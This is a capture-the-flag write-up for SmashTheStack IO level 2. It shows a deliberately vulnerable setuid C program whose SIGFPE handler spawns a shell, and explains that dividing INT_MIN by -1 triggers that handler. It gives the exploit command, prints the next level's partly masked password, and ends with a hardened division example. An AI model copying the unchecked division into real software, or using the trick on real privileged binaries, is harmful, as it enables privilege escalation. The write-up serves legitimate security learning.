[SmashTheStack – IO] Level 2


So after finishing level 1, I started the next level, level 2.

Accessing __/levels__, I found the target, both the binary and its source code (level02 and level02.c).

View source code:

//a little fun brought to you by bla

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>

void catcher(int a)
{
        setresuid(geteuid(),geteuid(),geteuid());
        printf("WIN!\n");
        system("/bin/sh");
        exit(0);
}

int main(int argc, char **argv)
{
        puts("source code is available in level02.c\n");

        if (argc != 3 || !atoi(argv[2]))
                return 1;
        signal(SIGFPE, catcher);
        return abs(atoi(argv[1])) / atoi(argv[2]);
}

It is easy to see that the goal is to trigger the __SIGFPE__ signal so that __catcher()__ is called and gives a shell for the next level.
The arguments are checked first: there must be three of them (counting the program name), and __atoi()__ of the third one must not return 0.
So what is __SIGFPE__?
See these links:
http://en.wikipedia.org/wiki/SIGFPE#SIGFPE
http://www.kernel.org/doc/man-pages/online/pages/man2/signal.2.html
http://www.gnu.org/software/libc/manual/html_node/Program-Error-Signals.html

It turns out to be an exception raised when dividing by zero. That cannot happen in our case, though, because there is an argument check on the 2nd argument.
However, the “Notes” section of the kernel.org page says: “(Also dividing the most negative integer by -1 may generate SIGFPE.)”

So try it by dividing the most negative integer by -1.

level2@io:/levels$ ./level02 -2147483648 -1
source code is available in level02.c

WIN!
sh-4.1$ cat /home/level3/.pass
G2K2EP1luDpd**

On to the next level!
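
The check in level02 rules out only a zero divisor. As an added example (not part of the original post or the level's source), here is a hardened form of the same computation that rejects both failing cases of signed division; `parse_int`, `checked_div` and `abs_quotient` are hypothetical helper names, and the input in `main` is constructed.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

enum div_status { DIV_OK, DIV_BAD_INPUT, DIV_BY_ZERO, DIV_OVERFLOW };

/* Strict replacement for atoi(): no empty input, trailing junk or out-of-range values. */
static int parse_int(const char *s, int *out)
{
    char *end;
    long v;
    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return -1;
    *out = (int)v;
    return 0;
}

/* Signed division has two failing cases, not one. */
enum div_status checked_div(int a, int b, int *q)
{
    if (b == 0)
        return DIV_BY_ZERO;      /* the only case level02 guards against */
    if (a == INT_MIN && b == -1)
        return DIV_OVERFLOW;     /* quotient would be INT_MAX + 1 */
    *q = a / b;
    return DIV_OK;
}

/* abs(num) / den on command-line style strings, as level02 computes it. */
enum div_status abs_quotient(const char *num, const char *den, int *q)
{
    int a, b;
    if (parse_int(num, &a) != 0 || parse_int(den, &b) != 0)
        return DIV_BAD_INPUT;
    if (a == INT_MIN)
        return DIV_OVERFLOW;     /* abs(INT_MIN) is not representable either */
    return checked_div(abs(a), b, q);
}

int main(void)
{
    int q = 0;
    /* Constructed input: the argument pair used in the session above. */
    printf("status=%d\n", abs_quotient("-2147483648", "-1", &q));
    return 0;
}
```
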

Cheers,
Pete Houston
